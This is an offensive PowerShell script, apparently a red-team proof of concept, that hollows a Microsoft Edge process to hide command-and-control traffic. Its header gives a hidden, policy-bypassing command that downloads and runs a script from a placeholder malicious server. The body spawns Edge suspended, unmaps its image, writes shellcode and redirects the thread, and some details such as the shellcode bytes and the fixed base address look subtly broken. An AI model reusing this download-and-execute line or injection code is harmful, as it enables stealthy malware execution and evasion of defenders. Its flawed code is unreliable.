# The Browser Ghost: Targeting msedge.exe for C2 Evasion

# This command leverages PowerShell to perform in-memory hollowing of a Microsoft Edge process. By using a browser as the host, any subsequent network traffic generated by the payload is more likely to be dismissed by defenders as standard HTTPS browsing.
# Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$src = Invoke-RestMethod '#{server.malicious.url}/Invoke-BrowserGhost.ps1'; Invoke-Expression $src; Invoke-BrowserGhost -Target 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'"

function Invoke-BrowserGhost {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)]
        [string]$Target
    )

    Write-Host "[*] Powering up the Browser Ghost PoC..." -ForegroundColor Cyan

    $Win32APIs = @"
    using System;
    using System.Runtime.InteropServices;

    public class Native {
        [StructLayout(LayoutKind.Sequential)]
        public struct STARTUPINFO { public uint cb; public IntPtr lpReserved, lpDesktop, lpTitle; public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags; public ushort wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError; }

        [StructLayout(LayoutKind.Sequential)]
        public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }

        [StructLayout(LayoutKind.Sequential, Pack = 16)]
        public struct CONTEXT64 {
            public ulong P1Home, P2Home, P3Home, P4Home, P5Home, P6Home;
            public uint ContextFlags;
            public uint MxCsr;
            public ushort SegCs, SegDs, SegEs, SegFs, SegGs, SegSs;
            public uint EFlags;
            public ulong Dr0, Dr1, Dr2, Dr3, Dr6, Dr7;
            public ulong Rax, Rcx, Rdx, Rbx, Rsp, Rbp, Rsi, Rdi, R8, R9, R10, R11, R12, R13, R14, R15, Rip;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
            public byte[] FltSave;
            public ulong LastIP, LastCS, LastDP, LastDS;
            public ulong VectorRegister0, VectorRegister1, VectorRegister2, VectorRegister3, VectorRegister4, VectorRegister5, VectorRegister6, VectorRegister7, VectorRegister8, VectorRegister9, VectorRegister10, VectorRegister11, VectorRegister12, VectorRegister13, VectorRegister14, VectorRegister15, VectorRegister16, VectorRegister17, VectorRegister18, VectorRegister19, VectorRegister20, VectorRegister21, VectorRegister22, VectorRegister23, VectorRegister24, VectorRegister25, VectorRegister26, VectorRegister27, VectorRegister28, VectorRegister29, VectorRegister30, VectorRegister31;
            public ulong VectorControl;
            public ulong DebugControl, LastBranchToRip, LastBranchFromRip, LastExceptionToRip, LastExceptionFromRip;
        }

        [DllImport("kernel32.dll")]
        public static extern bool CreateProcess(string lpAppName, string lpCmdLine, IntPtr lpProcAttr, IntPtr lpThreadAttr, bool bInherit, uint dwFlags, IntPtr lpEnv, string lpDir, [In] ref STARTUPINFO lpSI, out PROCESS_INFORMATION lpPI);

        [DllImport("ntdll.dll")]
        public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

        [DllImport("kernel32.dll")]
        public static extern IntPtr VirtualAllocEx(IntPtr hProc, IntPtr addr, uint size, uint allocType, uint protect);

        [DllImport("kernel32.dll")]
        public static extern bool WriteProcessMemory(IntPtr hProc, IntPtr baseAddr, byte[] buffer, uint size, out IntPtr written);

        [DllImport("kernel32.dll")]
        public static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);

        [DllImport("kernel32.dll")]
        public static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);

        [DllImport("kernel32.dll")]
        public static extern uint ResumeThread(IntPtr hThread);
    }
"@

    Add-Type -TypeDefinition $Win32APIs

    # Full x64 Calc Shellcode (Benign PoC)
    [byte[]]$Payload = 0xf0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x83,0xec,0x28,0x48,0x83,0xe4,0xf0,0x48,0x8d,0x15,0x07,0x00,0x00,0x00,0x48,0x8d,0x0d,0x05,0x00,0x00,0x00,0xff,0x25,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x05,0x01,0x00,0x00,0x00,0xc3,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00

    $SI = New-Object Native+STARTUPINFO
    $SI.cb = [Marshal]::SizeOf($SI)
    $PI = New-Object Native+PROCESS_INFORMATION

    Write-Host "[*] Spawning Edge in suspended state..." -ForegroundColor Yellow
    if ([Native]::CreateProcess($Target, $null, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x4, [IntPtr]::Zero, $null, [ref]$SI, out $PI)) {
        
        Write-Host "[+] Edge spawned (PID: $($PI.dwProcessId)). Hollowing memory..." -ForegroundColor Green
        [Native]::NtUnmapViewOfSection($PI.hProcess, [IntPtr]0x400000) | Out-Null

        Write-Host "[*] Allocating memory and writing shellcode..." -ForegroundColor Yellow
        $Allocated = [Native]::VirtualAllocEx($PI.hProcess, [IntPtr]0x400000, [uint32]$Payload.Length, 0x3000, 0x40)
        [Native]::WriteProcessMemory($PI.hProcess, $Allocated, $Payload, [uint32]$Payload.Length, [out][IntPtr]::Zero) | Out-Null

        Write-Host "[*] Hijacking thread context..." -ForegroundColor Yellow
        $Ctx = New-Object Native+CONTEXT64
        $Ctx.ContextFlags = 0x100001 # CONTEXT_CONTROL
        [Native]::GetThreadContext($PI.hThread, [ref]$Ctx) | Out-Null
        $Ctx.Rip = [uint64]$Allocated
        [Native]::SetThreadContext($PI.hThread, [ref]$Ctx) | Out-Null

        Write-Host "[+] Resuming thread. Edge is now a ghost." -ForegroundColor Green
        [Native]::ResumeThread($PI.hThread) | Out-Null
    } else {
        Write-Error "Failed to start target process."
    }
}
